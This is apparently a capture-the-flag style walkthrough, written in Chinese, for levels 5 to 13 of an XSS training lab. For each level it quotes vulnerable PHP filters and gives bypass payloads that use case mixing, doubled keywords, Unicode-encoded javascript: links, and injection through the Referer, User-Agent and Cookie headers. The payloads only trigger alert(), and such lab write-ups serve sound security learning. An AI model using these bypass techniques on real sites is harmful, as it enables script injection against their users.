1.1 level5
查看源码关键部分
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);<input name=keyword value="'.$str3.'">
关键部分就四句话,get传的参数,要是有<script>标签将被转换为<scr_ipt>所以不能使用这个标签,要是有on则会转化为o_n,所以就不能使用onfocus事件来传参,虽然str_replace不区分大小写,但是有字母转换为小写的函数。就是strtolower,将get传入的参数全部转换为小写,所以就不能用大小写传参
只能找一个新的方法,就是a href 标签,就是超链接标签,可以跳转到其他链接的页面
当点击<a>标签,就会跳转到指定链接网站
构造str3,将str3嵌套在input的value中,首先就是要闭合input标签,然后就是构造<a>标签
本题payload:
"> <a href=javascript:alert()>通关</a>
点击通关,即可成功
1.2 level6
查看源码关键部分
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">发现本关过滤了好多东西,<script>,on,src,data,href都被过滤,说明前几关的方法都不行,仔细观察,本关没有大小写过滤,说明就可以构造大小写来绕过,这样前面的方法通过大小写都可以在本关绕过
共有三种payload:
"> <sCript>alert(1)</sCript>
" Onfocus=javascript:alert() "
"> <a hRef=javascript:alert()>通关</a>
1.3 level7
查看源码关键部分
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">发现本关过滤了好多东西,<script>,on,src,data,href都被过滤,甚至把大小写也过滤了,但是不慌,我们这里可以进行双写绕过、
比如on,我们可以写成oonn,当中间on被删掉的时候,就变成了on
比如script,可以写成scscriptipt,当中间script被删掉的时候,就变成了script
本关payload:
"> <a hrehreff=javasscriptcript:alert()>通关</a>
1.4 level8
查看源码关键部分
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'"><?phpecho '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>发现本关过滤了好多东西,<script>,on,src,data,href都被过滤,甚至把大小写也过滤了,还有把双引号也绕过,value值也被实体化,这下前面的方法都不能绕过
但是我们能利用href的隐藏属性自动Unicode解码,我们可以插入一段js伪协议
javascript:alert()
利用unicode在线编码,将其转码
本关payload:
javascript:alert()
1.5 level9
查看源码关键部分
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';}
else
{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>发现和上一题很相似,但是多了下面的strpos函数
发现传参的值必须有http://这个,才可以绕过,我们只需要往传入的值加上http://即可,但是加上后就构造不成一个有效的指令,这里我们在用注释符把http://注释掉就可以了,注释符为/**/
本关payload:
javascript:alert()/*http://*/
1.6 level10
查看源码关键部分
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">这里就没有上几关过滤的东西多了,过滤了<>,所以不能用闭合input标签来绕过,所以就可以用onfocus事件绕过,但是这里传参的值是hidden,输入框被隐藏了,没有输入框,怎么用onfocus事件呢?不慌,这里我们可以把type改成text即可,就是添加type="text",这里get传参名是t_sort
本关payload:(get传参)
?t_sort=" onfocus=javascript:alert() type="text
1.7 level11
查看源码关键部分
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">分析可得,get传参的值嵌套在input的value中,也就是str33的值,分析str33
<>被过滤,还有_SERVER,str11中的参数是referer
就代表着,str3的值还包括http头,就说明在referer中记录,所以用bp抓包,改一下referer的值,添加http头
用onfocus+http头构造payload
本关payload:
Referer: " onfocus=javascript:alert() type="text
1.8 level12
查看源码关键部分
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua" value="'.$str33.'" type="hidden">
</form>观察发现是UA头,因为str11参数有UA
所以和上题一样,构造为UA头即可
本关payload:
" onfocus=javascript:alert() type="text
1.9 level 13
查看源码关键部分
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook" value="'.$str33.'" type="hidden">观察发现是COOKIE,是因为str11,cookie的参数是user,所以我们改user的值就可以了
本关payload:
" onfocus=javascript:alert() type="text
